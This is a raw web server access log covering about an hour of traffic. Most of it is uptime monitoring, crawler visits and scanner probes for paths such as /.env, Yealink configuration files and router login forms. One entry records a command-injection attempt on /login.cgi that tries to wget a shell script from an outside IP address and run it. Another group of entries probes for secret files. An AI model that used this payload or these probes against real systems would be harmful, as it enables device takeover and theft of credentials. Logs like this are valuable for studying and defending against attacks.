185.225.75.86 - - [01/Aug/2023:11:38:52 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.87:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [01/Aug/2023:11:39:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:11:40:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:11:41:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
211.75.169.242 - - [01/Aug/2023:11:41:58 +0200] "GET /login?from=%2F HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36"
212.91.246.72 - - [01/Aug/2023:11:42:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:11:43:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:11:44:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:11:45:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:11:46:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:11:47:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:11:48:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:11:49:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:11:50:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:11:51:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.94.146.60 - - [01/Aug/2023:11:52:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.146.60 - - [01/Aug/2023:11:52:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.60 - - [01/Aug/2023:11:52:07 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.146.60 - - [01/Aug/2023:11:52:07 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [01/Aug/2023:11:52:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:11:53:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:11:54:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:11:55:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:11:56:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:11:57:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:11:58:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
172.111.10.167 - - [01/Aug/2023:11:58:39 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.88:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [01/Aug/2023:11:59:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
52.167.144.56 - - [01/Aug/2023:11:59:30 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
167.248.133.124 - - [01/Aug/2023:12:00:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.248.133.124 - - [01/Aug/2023:12:00:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.124 - - [01/Aug/2023:12:00:12 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.248.133.124 - - [01/Aug/2023:12:00:12 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [01/Aug/2023:12:00:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:12:01:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
52.167.144.31 - - [01/Aug/2023:12:02:04 +0200] "GET /sitemap.xml.gz HTTP/1.1" 404 319 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
212.91.246.72 - - [01/Aug/2023:12:02:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
211.46.18.1 - - [01/Aug/2023:12:02:27 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://192.210.162.147/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
45.234.60.192 - - [01/Aug/2023:12:02:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [01/Aug/2023:12:03:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:12:04:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:12:05:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:12:06:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.111.236.86 - - [01/Aug/2023:12:06:36 +0200] "GET /yealink/config/y000000000028.cfg HTTP/1.1" 404 337 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:12:06:36 +0200] "GET /yealink/config/y000000000000.cfg HTTP/1.1" 404 337 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:12:06:36 +0200] "GET /yealink/config/y000000000028.cfg HTTP/1.1" 404 337 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:12:06:36 +0200] "GET /yealink/config/y000000000044.cfg HTTP/1.1" 404 337 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:12:06:37 +0200] "GET /yealink/config/y000000000028.cfg HTTP/1.1" 404 337 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:12:06:37 +0200] "GET /yealink/config/y000000000044.cfg HTTP/1.1" 404 337 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:12:06:37 +0200] "GET /yealink/config/y000000000028.cfg HTTP/1.1" 404 337 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:12:06:37 +0200] "GET /yealink/config/y000000000028.cfg HTTP/1.1" 404 337 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:12:06:37 +0200] "GET /yealink/config/y000000000028.cfg HTTP/1.1" 404 337 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:12:06:37 +0200] "GET /yealink/config/y000000000028.cfg HTTP/1.1" 404 337 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:12:06:37 +0200] "GET /yealink/config/y000000000044.cfg HTTP/1.1" 404 337 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:12:06:37 +0200] "GET /yealink/config/y000000000000.cfg HTTP/1.1" 404 337 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:12:06:37 +0200] "GET /yealink/config/y000000000044.cfg HTTP/1.1" 404 337 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:12:06:37 +0200] "GET /yealink/config/y000000000000.cfg HTTP/1.1" 404 337 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:12:06:37 +0200] "GET /yealink/config/y000000000028.cfg HTTP/1.1" 404 337 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:12:06:37 +0200] "GET /yealink/config/y000000000028.cfg HTTP/1.1" 404 337 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:12:06:37 +0200] "GET /yealink/config/y000000000000.cfg HTTP/1.1" 404 337 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:12:06:37 +0200] "GET /yealink/config/y000000000000.cfg HTTP/1.1" 404 337 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:12:06:37 +0200] "GET /yealink/config/y000000000044.cfg HTTP/1.1" 404 337 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:12:06:37 +0200] "GET /yealink/config/y000000000044.cfg HTTP/1.1" 404 337 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:12:06:37 +0200] "GET /yealink/config/y000000000044.cfg HTTP/1.1" 404 337 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:12:06:37 +0200] "GET /yealink/config/y000000000044.cfg HTTP/1.1" 404 337 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:12:06:37 +0200] "GET /yealink/config/y000000000000.cfg HTTP/1.1" 404 337 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:12:06:37 +0200] "GET /yealink/config/y000000000044.cfg HTTP/1.1" 404 337 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:12:06:37 +0200] "GET /yealink/config/y000000000044.cfg HTTP/1.1" 404 337 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:12:06:37 +0200] "GET /yealink/config/y000000000000.cfg HTTP/1.1" 404 337 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:12:06:37 +0200] "GET /yealink/config/y000000000000.cfg HTTP/1.1" 404 337 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:12:06:37 +0200] "GET /yealink/config/y000000000000.cfg HTTP/1.1" 404 337 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:12:06:37 +0200] "GET /yealink/config/y000000000000.cfg HTTP/1.1" 404 337 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:12:06:37 +0200] "GET /yealink/config/y000000000028.cfg HTTP/1.1" 404 337 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:12:06:45 +0200] "GET /yealink/config/y000000000068.cfg HTTP/1.1" 404 337 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:12:06:45 +0200] "GET /yealink/config/y000000000068.cfg HTTP/1.1" 404 337 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:12:06:46 +0200] "GET /yealink/config/y000000000068.cfg HTTP/1.1" 404 337 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:12:06:46 +0200] "GET /yealink/config/y000000000068.cfg HTTP/1.1" 404 337 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:12:06:46 +0200] "GET /yealink/config/y000000000068.cfg HTTP/1.1" 404 337 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:12:06:46 +0200] "GET /yealink/config/y000000000068.cfg HTTP/1.1" 404 337 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:12:06:46 +0200] "GET /yealink/config/y000000000068.cfg HTTP/1.1" 404 337 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:12:06:46 +0200] "GET /yealink/config/y000000000068.cfg HTTP/1.1" 404 337 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:12:06:46 +0200] "GET /yealink/config/y000000000068.cfg HTTP/1.1" 404 337 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:12:06:46 +0200] "GET /yealink/config/y000000000068.cfg HTTP/1.1" 404 337 "-" "libwww-perl/6.72"
212.91.246.72 - - [01/Aug/2023:12:07:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:12:08:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:12:09:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:12:10:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.180.143.49 - - [01/Aug/2023:12:10:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.217.0.181 - - [01/Aug/2023:12:11:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; . NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3)"
212.91.246.72 - - [01/Aug/2023:12:11:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:12:12:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:12:13:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:12:14:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.94.138.127 - - [01/Aug/2023:12:14:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.127 - - [01/Aug/2023:12:14:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.127 - - [01/Aug/2023:12:14:21 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.138.127 - - [01/Aug/2023:12:14:21 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [01/Aug/2023:12:15:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:12:16:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:12:17:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
188.136.169.242 - - [01/Aug/2023:12:17:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [01/Aug/2023:12:18:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:12:19:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:12:20:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.180.143.11 - - [01/Aug/2023:12:21:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [01/Aug/2023:12:21:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:12:22:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:12:23:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:12:24:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.66.230.105 - - [01/Aug/2023:12:24:52 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
159.203.224.31 - - [01/Aug/2023:12:25:14 +0200] "GET /actuator/health HTTP/1.1" 404 320 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [01/Aug/2023:12:25:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
159.203.224.31 - - [01/Aug/2023:12:25:17 +0200] "GET /actuator/health HTTP/1.1" 404 320 "-" "Mozilla/5.0 zgrab/0.x"
159.203.224.31 - - [01/Aug/2023:12:25:20 +0200] "GET /actuator/health HTTP/1.1" 404 320 "-" "Mozilla/5.0 zgrab/0.x"
159.203.224.31 - - [01/Aug/2023:12:25:24 +0200] "GET /actuator/health HTTP/1.1" 404 320 "-" "Mozilla/5.0 zgrab/0.x"
159.203.224.31 - - [01/Aug/2023:12:25:29 +0200] "GET /actuator/health HTTP/1.1" 404 320 "-" "Mozilla/5.0 zgrab/0.x"
159.203.224.31 - - [01/Aug/2023:12:25:37 +0200] "GET /actuator/health HTTP/1.1" 404 320 "-" "Mozilla/5.0 zgrab/0.x"
159.203.224.31 - - [01/Aug/2023:12:25:44 +0200] "GET /actuator/health HTTP/1.1" 404 320 "-" "Mozilla/5.0 zgrab/0.x"
159.203.224.31 - - [01/Aug/2023:12:25:47 +0200] "GET /actuator/health HTTP/1.1" 404 320 "-" "Mozilla/5.0 zgrab/0.x"
159.203.224.31 - - [01/Aug/2023:12:25:58 +0200] "GET /actuator/health HTTP/1.1" 404 320 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [01/Aug/2023:12:26:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
159.203.224.31 - - [01/Aug/2023:12:26:15 +0200] "GET /actuator/health HTTP/1.1" 404 320 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [01/Aug/2023:12:27:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:12:28:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:12:29:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:12:30:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:12:31:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:12:32:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:12:33:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.66.230.105 - - [01/Aug/2023:12:33:42 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
212.91.246.72 - - [01/Aug/2023:12:34:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:12:35:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:12:36:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:12:37:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
207.46.13.224 - - [01/Aug/2023:12:37:37 +0200] "GET /sitemap.xml.gz HTTP/1.1" 404 319 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
212.91.246.72 - - [01/Aug/2023:12:38:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:12:39:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:12:40:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:12:41:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:12:42:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:12:43:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:12:44:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:12:45:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:12:46:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:12:47:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:12:48:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:12:49:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:12:50:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:12:51:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:12:52:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:12:53:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:12:54:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:12:55:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:12:56:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.42.32.170 - - [01/Aug/2023:12:56:50 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
193.42.32.170 - - [01/Aug/2023:12:56:50 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
193.42.32.170 - - [01/Aug/2023:12:57:06 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
193.42.32.170 - - [01/Aug/2023:12:57:06 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
193.42.32.170 - - [01/Aug/2023:12:57:14 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
